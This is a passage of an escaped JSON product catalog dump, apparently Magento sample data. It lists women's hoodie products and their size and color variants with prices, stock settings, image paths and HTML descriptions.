qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh05-white_back.jpg\",\"image\":\"\\/w\\/h\\/wh05-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh05-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh05-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"White\"},\"1061\":{\"sku\":\"WH05\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Selene Yoga Hoodie\",\"description\":\"<p>The Selene Yoga Hoodie gets you to and from the studio in semi form-fitted comfort. Snug, sleek contours add fashion to function in this free-moving yoga warm up sweatshirt.<\\/p>\\n<p>&bull; Ivory heather full zip 3\\/4 sleeve hoodie.<br \\/>&bull; Zip pocket at arm for convenient storage.<br \\/>&bull; 24.0\\\" body length.<br \\/>&bull; 89% Polyester \\/ 11% Spandex.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh05-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh05-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh05-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Hoodie|Full zip,material=Polyester|Spandex,pattern=Solid,climate=Indoor|Mild|Spring,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WH05-XS-Orange,size=XS,color=Orange|sku=WH05-XS-Purple,size=XS,color=Purple|sku=WH05-XS-White,size=XS,color=White|sku=WH05-S-Orange,size=S,color=Orange|sku=WH05-S-Purple,size=S,color=Purple|sku=WH05-S-White,size=S,color=White|sku=WH05-M-Orange,size=M,color=Orange|sku=WH05-M-Purple,size=M,color=Purple|sku=WH05-M-White,size=M,color=White|sku=WH05-L-Orange,size=L,color=Orange|sku=WH05-L-Purple,size=L,color=Purple|sku=WH05-L-White,size=L,color=White|sku=WH05-XL-Orange,size=XL,color=Orange|sku=WH05-XL-Purple,size=XL,color=Purple|sku=WH05-XL-White,size=XL,color=White\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh05-white_back.jpg\",\"image\":\"\\/w\\/h\\/wh05-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh05-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh05-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Hoodie|Full zip\",\"material\":\"Polyester|Spandex\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Mild|Spring\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1062\":{\"sku\":\"WH06-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Daphne Full-Zip Hoodie-XS-Purple\",\"description\":\"<p>The Daphne Hoodie is an attractive yet rugged layering or outer piece, especially for chilly days en route the studio, doing yardwork or enjoying outdoor recreation.<\\/p>\\n<p>&bull; Purple full zip hoodie with pink accents. <br \\/>&bull; Heather texture.<br \\/>&bull; 4-way stretch.<br \\/>&bull; Pre-shrunk.<br \\/>&bull; Hood lined in vegan Sherpa for added warmth.<br \\/>&bull; Ribbed hem on hood and front pouch pocket.<br \\/>&bull; 60% Cotton \\/ 40% Polyester.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"daphne-full-zip-hoodie-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh06-purple_alt1.jpg,\\/w\\/h\\/wh06-purple_back.jpg\",\"image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh06-purple_alt1.jpg,\\/w\\/h\\/wh06-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"1063\":{\"sku\":\"WH06-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Daphne Full-Zip Hoodie-S-Purple\",\"description\":\"<p>The Daphne Hoodie is an attractive yet rugged layering or outer piece, especially for chilly days en route the studio, doing yardwork or enjoying outdoor recreation.<\\/p>\\n<p>&bull; Purple full zip hoodie with pink accents. <br \\/>&bull; Heather texture.<br \\/>&bull; 4-way stretch.<br \\/>&bull; Pre-shrunk.<br \\/>&bull; Hood lined in vegan Sherpa for added warmth.<br \\/>&bull; Ribbed hem on hood and front pouch pocket.<br \\/>&bull; 60% Cotton \\/ 40% Polyester.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"daphne-full-zip-hoodie-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh06-purple_alt1.jpg,\\/w\\/h\\/wh06-purple_back.jpg\",\"image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh06-purple_alt1.jpg,\\/w\\/h\\/wh06-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"1064\":{\"sku\":\"WH06-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Daphne Full-Zip Hoodie-M-Purple\",\"description\":\"<p>The Daphne Hoodie is an attractive yet rugged layering or outer piece, especially for chilly days en route the studio, doing yardwork or enjoying outdoor recreation.<\\/p>\\n<p>&bull; Purple full zip hoodie with pink accents. <br \\/>&bull; Heather texture.<br \\/>&bull; 4-way stretch.<br \\/>&bull; Pre-shrunk.<br \\/>&bull; Hood lined in vegan Sherpa for added warmth.<br \\/>&bull; Ribbed hem on hood and front pouch pocket.<br \\/>&bull; 60% Cotton \\/ 40% Polyester.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"daphne-full-zip-hoodie-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh06-purple_alt1.jpg,\\/w\\/h\\/wh06-purple_back.jpg\",\"image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh06-purple_alt1.jpg,\\/w\\/h\\/wh06-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"1065\":{\"sku\":\"WH06-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Daphne Full-Zip Hoodie-L-Purple\",\"description\":\"<p>The Daphne Hoodie is an attractive yet rugged layering or outer piece, especially for chilly days en route the studio, doing yardwork or enjoying outdoor recreation.<\\/p>\\n<p>&bull; Purple full zip hoodie with pink accents. <br \\/>&bull; Heather texture.<br \\/>&bull; 4-way stretch.<br \\/>&bull; Pre-shrunk.<br \\/>&bull; Hood lined in vegan Sherpa for added warmth.<br \\/>&bull; Ribbed hem on hood and front pouch pocket.<br \\/>&bull; 60% Cotton \\/ 40% Polyester.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"daphne-full-zip-hoodie-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh06-purple_alt1.jpg,\\/w\\/h\\/wh06-purple_back.jpg\",\"image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh06-purple_alt1.jpg,\\/w\\/h\\/wh06-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"1066\":{\"sku\":\"WH06-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Daphne Full-Zip Hoodie-XL-Purple\",\"description\":\"<p>The Daphne Hoodie is an attractive yet rugged layering or outer piece, especially for chilly days en route the studio, doing yardwork or enjoying outdoor recreation.<\\/p>\\n<p>&bull; Purple full zip hoodie with pink accents. <br \\/>&bull; Heather texture.<br \\/>&bull; 4-way stretch.<br \\/>&bull; Pre-shrunk.<br \\/>&bull; Hood lined in vegan Sherpa for added warmth.<br \\/>&bull; Ribbed hem on hood and front pouch pocket.<br \\/>&bull; 60% Cotton \\/ 40% Polyester.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"daphne-full-zip-hoodie-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh06-purple_alt1.jpg,\\/w\\/h\\/wh06-purple_back.jpg\",\"image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh06-purple_alt1.jpg,\\/w\\/h\\/wh06-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"1067\":{\"sku\":\"WH06\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Daphne Full-Zip Hoodie\",\"description\":\"<p>The Daphne Hoodie is an attractive yet rugged layering or outer piece, especially for chilly days en route the studio, doing yardwork or enjoying outdoor recreation.<\\/p>\\n<p>&bull; Purple full zip hoodie with pink accents. <br \\/>&bull; Heather texture.<br \\/>&bull; 4-way stretch.<br \\/>&bull; Pre-shrunk.<br \\/>&bull; Hood lined in vegan Sherpa for added warmth.<br \\/>&bull; Ribbed hem on hood and front pouch pocket.<br \\/>&bull; 60% Cotton \\/ 40% Polyester.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Hoodie|Full zip,material=Cotton|Polyester,pattern=Solid,climate=All-weather|Cold|Cool|Spring|Windy|Wintry,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WH06-XS-Purple,size=XS,color=Purple|sku=WH06-S-Purple,size=S,color=Purple|sku=WH06-M-Purple,size=M,color=Purple|sku=WH06-L-Purple,size=L,color=Purple|sku=WH06-XL-Purple,size=XL,color=Purple\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh06-purple_alt1.jpg,\\/w\\/h\\/wh06-purple_back.jpg\",\"image\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh06-purple_alt1.jpg,\\/w\\/h\\/wh06-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Hoodie|Full zip\",\"material\":\"Cotton|Polyester\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Cold|Cool|Spring|Windy|Wintry\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1068\":{\"sku\":\"WH07-XS-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Phoebe Zipper Sweatshirt-XS-Gray\",\"description\":\"<p>A sophisticated layer of warmth awaits you in our full-zip sweatshirt jacket. You\'ll reach for this one in any season to enjoy its sturdy exterior and plush interior.<\\/p>\\n<p>&bull; Gray full zip hoodie with yellow detail.<br \\/>&bull; Hand-warmer pockets. <br \\/>&bull; Zip MP3 pocket with outlet for earphones wire. <br \\/>&bull; Polyester\\/cotton. <br \\/>&bull; Washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 